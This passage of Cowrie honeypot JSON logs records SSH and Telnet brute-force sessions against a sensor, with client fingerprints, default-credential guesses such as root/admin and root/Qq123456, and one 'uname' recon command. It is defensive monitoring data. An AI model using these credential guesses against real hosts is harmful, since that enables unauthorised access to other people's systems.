{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-28T05:36:19.554003Z","src_ip":"212.227.235.229","session":"7ddf40fa37fa"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:20.705317Z","src_ip":"212.227.235.229","session":"7ddf40fa37fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36648,"dst_ip":"1.2.3.4","dst_port":22,"session":"9faafb3951ba","protocol":"ssh","message":"New connection: 212.227.235.229:36648 (1.2.3.4:22) [session: 9faafb3951ba]","sensor":"my-vps","timestamp":"2025-08-28T05:36:37.041714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:36:37.042864Z","src_ip":"212.227.235.229","session":"9faafb3951ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:36:37.187228Z","src_ip":"212.227.235.229","session":"9faafb3951ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51032,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed3fd3301438","protocol":"telnet","message":"New connection: 212.227.235.229:51032 (1.2.3.4:23) [session: ed3fd3301438]","sensor":"my-vps","timestamp":"2025-08-28T05:36:37.190981Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:36:37.393599Z","src_ip":"212.227.235.229","session":"ed3fd3301438"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:36:37.415293Z","src_ip":"212.227.235.229","session":"ed3fd3301438"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-28T05:36:37.621766Z","src_ip":"212.227.235.229","session":"9faafb3951ba"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:38.768134Z","src_ip":"212.227.235.229","session":"9faafb3951ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43522,"dst_ip":"1.2.3.4","dst_port":22,"session":"43927917c45e","protocol":"ssh","message":"New connection: 212.227.125.160:43522 (1.2.3.4:22) [session: 43927917c45e]","sensor":"my-vps","timestamp":"2025-08-28T05:36:42.657990Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:42.719383Z","src_ip":"212.227.125.160","session":"43927917c45e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50884,"dst_ip":"1.2.3.4","dst_port":22,"session":"600c2ef14f52","protocol":"ssh","message":"New connection: 212.227.125.160:50884 (1.2.3.4:22) [session: 600c2ef14f52]","sensor":"my-vps","timestamp":"2025-08-28T05:36:44.493623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:36:44.494370Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:36:44.649599Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:36:44.989926Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:36:45.305053Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:36:45.305744Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:45.412212Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:45.413269Z","src_ip":"212.227.125.160","session":"600c2ef14f52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54180,"dst_ip":"1.2.3.4","dst_port":22,"session":"db04b7584cd8","protocol":"ssh","message":"New connection: 212.227.235.229:54180 (1.2.3.4:22) [session: db04b7584cd8]","sensor":"my-vps","timestamp":"2025-08-28T05:36:49.904773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:36:49.908819Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:36:50.059377Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:36:50.629853Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:36:51.041305Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:36:51.042072Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:51.186580Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:51.187769Z","src_ip":"212.227.235.229","session":"db04b7584cd8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:52.681342Z","src_ip":"79.124.8.120","session":"faf40d2eba7f"}
{"eventid":"cowrie.session.closed","duration":180.1361482143402,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:52.686251Z","src_ip":"79.124.8.120","session":"faf40d2eba7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42086,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bc850ba07d7","protocol":"ssh","message":"New connection: 212.227.125.160:42086 (1.2.3.4:22) [session: 1bc850ba07d7]","sensor":"my-vps","timestamp":"2025-08-28T05:36:56.376352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:36:56.399230Z","src_ip":"212.227.125.160","session":"1bc850ba07d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:36:56.487189Z","src_ip":"212.227.125.160","session":"1bc850ba07d7"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T05:36:56.954652Z","src_ip":"212.227.125.160","session":"1bc850ba07d7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:36:58.065225Z","src_ip":"212.227.125.160","session":"1bc850ba07d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57352,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4c3e576a0a5","protocol":"ssh","message":"New connection: 212.227.125.160:57352 (1.2.3.4:22) [session: f4c3e576a0a5]","sensor":"my-vps","timestamp":"2025-08-28T05:37:11.461012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:11.521837Z","src_ip":"212.227.125.160","session":"f4c3e576a0a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:11.584888Z","src_ip":"212.227.125.160","session":"f4c3e576a0a5"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:11.987177Z","src_ip":"212.227.125.160","session":"f4c3e576a0a5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:13.093030Z","src_ip":"212.227.125.160","session":"f4c3e576a0a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35094,"dst_ip":"1.2.3.4","dst_port":22,"session":"08d0a0d0971e","protocol":"ssh","message":"New connection: 212.227.235.229:35094 (1.2.3.4:22) [session: 08d0a0d0971e]","sensor":"my-vps","timestamp":"2025-08-28T05:37:18.623064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:18.624728Z","src_ip":"212.227.235.229","session":"08d0a0d0971e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:18.768732Z","src_ip":"212.227.235.229","session":"08d0a0d0971e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44584,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1207228f4f1","protocol":"ssh","message":"New connection: 212.227.235.229:44584 (1.2.3.4:22) [session: b1207228f4f1]","sensor":"my-vps","timestamp":"2025-08-28T05:37:19.085733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:19.086487Z","src_ip":"212.227.235.229","session":"b1207228f4f1"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:19.202351Z","src_ip":"212.227.235.229","session":"08d0a0d0971e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:19.228754Z","src_ip":"212.227.235.229","session":"b1207228f4f1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:19.658790Z","src_ip":"212.227.235.229","session":"b1207228f4f1"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:20.348035Z","src_ip":"212.227.235.229","session":"08d0a0d0971e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:20.803366Z","src_ip":"212.227.235.229","session":"b1207228f4f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63563,"dst_ip":"1.2.3.4","dst_port":22,"session":"74379ae275a3","protocol":"ssh","message":"New connection: 212.227.235.229:63563 (1.2.3.4:22) [session: 74379ae275a3]","sensor":"my-vps","timestamp":"2025-08-28T05:37:25.880088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:37:25.910996Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47700,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2d4eb815c3b","protocol":"ssh","message":"New connection: 212.227.125.160:47700 (1.2.3.4:22) [session: a2d4eb815c3b]","sensor":"my-vps","timestamp":"2025-08-28T05:37:25.933748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:25.973372Z","src_ip":"212.227.125.160","session":"a2d4eb815c3b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:26.057516Z","src_ip":"212.227.125.160","session":"a2d4eb815c3b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr"